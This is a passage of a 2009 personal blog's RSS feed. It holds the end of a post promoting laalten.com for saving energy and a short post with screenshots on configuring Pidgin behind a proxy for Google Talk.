<p>Lets use <a href="http://www.laalten.com/" target="_blank">www.laalten.com</a> and save energy.</p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/use-laalten-save-energy/&amp;title=Use+laalten+..+save+Energy+..+%21%21" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/use-laalten-save-energy/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/use-laalten-save-energy/&amp;t=Use+laalten+..+save+Energy+..+%21%21" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Use+laalten+..+save+Energy+..+%21%21+-+http://b2l.me/pu43q+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/use-laalten-save-energy/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/use-laalten-save-energy/&amp;title=Use+laalten+..+save+Energy+..+%21%21&amp;summary=There%20is%20no%20need%20reminding%20everyone%20how%20crucial%20electric%20power%20is%20in%20current%20scenario%20.%20Rome%20was%20not%20built%20in%20a%20day%20%2C%20neither%20will%20this%20power%20be%20solved%20in%20a%20day%20.%20It%20needs%20continous%20effort%20of%20all%20of%20us%20in%20the%20direction%20of%20progress%20.%20We%20can%27t%20hope%20to%20change%20the%20very%20top%20and%20hope%20for%20this%20change%20to%20tr&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Use+laalten+..+save+Energy+..+%21%21&amp;du=http://magicalharsh.com/blog/use-laalten-save-energy/&amp;cn=There%20is%20no%20need%20reminding%20everyone%20how%20crucial%20electric%20power%20is%20in%20current%20scenario%20.%20Rome%20was%20not%20built%20in%20a%20day%20%2C%20neither%20will%20this%20power%20be%20solved%20in%20a%20day%20.%20It%20needs%20continous%20effort%20of%20all%20of%20us%20in%20the%20direction%20of%20progress%20.%20We%20can%27t%20hope%20to%20change%20the%20very%20top%20and%20hope%20for%20this%20change%20to%20tr" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li><a href="http://magicalharsh.com/blog/top-10-wordpress-plugins/" title="Top #10 Wordpress Plugins (April 30, 2009)">Top #10 Wordpress Plugins</a> </li>
	<li><a href="http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/" title="Configuring Pigdin behind a proxy (October 11, 2009)">Configuring Pigdin behind a proxy</a> </li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/use-laalten-save-energy/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Configuring Pigdin behind a proxy</title>
		<link>http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/</link>
		<comments>http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/#comments</comments>
		<pubDate>Sun, 11 Oct 2009 21:24:57 +0000</pubDate>
		<dc:creator>Harsh Singh</dc:creator>
				<category><![CDATA[Web]]></category>
		<category><![CDATA[softwares]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[google talk]]></category>
		<category><![CDATA[pigdin]]></category>
		<category><![CDATA[proxy server]]></category>
		<category><![CDATA[Tips and Tricks]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=661</guid>
		<description><![CDATA[
			
				
			
		
Its pretty easy to configure pigdin behind a proxy to work with your gtalk account :







		
			Stumble upon something good? Share it on StumbleUpon
		
		
			Share this on Technorati
		
		
			Share this on Facebook
		
		
			Tweet This!
		
		
			Subscribe to the comments for this post?
		
		
			Share this on LinkedIn
		
		
			Promote this on Orkut
		






	Related posts
	
	Use laalten .. save Energy .. !! 
	Top #10 Wordpress Plugins 
	google talk [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fconfiguring-pigdin-behind-a-proxy%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fconfiguring-pigdin-behind-a-proxy%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>Its pretty easy to configure pigdin behind a proxy to work with your gtalk account :</p>
<p style="text-align: center;"><a href="http://img101.imageshack.us/img101/9396/basic.jpg"><img class="aligncenter" src="http://img101.imageshack.us/img101/9396/basic.jpg" alt="" width="400" height="250" /></a></p>
<p style="text-align: center;"><a href="http://img101.imageshack.us/img101/7823/advanced.jpg"><img class="aligncenter" src="http://img101.imageshack.us/img101/7823/advanced.jpg" alt="" width="400" height="250" /></a></p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/&amp;title=Configuring+Pigdin+behind+a+proxy" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/&amp;t=Configuring+Pigdin+behind+a+proxy" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Configuring+Pigdin+behind+a+proxy+-+http://b2l.me/pu43r+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/&amp;title=Configuring+Pigdin+behind+a+proxy&amp;summary=Its%20pretty%20easy%20to%20configure%20pigdin%20behind%20a%20proxy%20to%20work%20with%20your%20gtalk%20account%20%3A%0D%0A%0D%0A&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Configuring+Pigdin+behind+a+proxy&amp;du=http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/&amp;cn=Its%20pretty%20easy%20to%20configure%20pigdin%20behind%20a%20proxy%20to%20work%20with%20your%20gtalk%20account%20%3A%0D%0A%0D%0A" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li><a href="http://magicalharsh.com/blog/use-laalten-save-energy/" title="Use laalten .. save Energy .. !! (October 16, 2009)">Use laalten .. save Energy .. !!</a> </li>
	<li><a href="http://magicalharsh.com/blog/top-10-wordpress-plugins/" title="Top #10 Wordpress Plugins (April 30, 2009)">Top #10 Wordpress Plugins</a> </li>
	<li><a href="http://magicalharsh.com/blog/google-talk-freezes-when-using-show-current-music-track-using-winamp-55/" title="google talk freezes when using show current music track using winamp 5.5 (November 25, 2008)">google talk freezes when using show current music track using winamp 5.5</a> </li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/configuring-pigdin-behind-a-proxy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
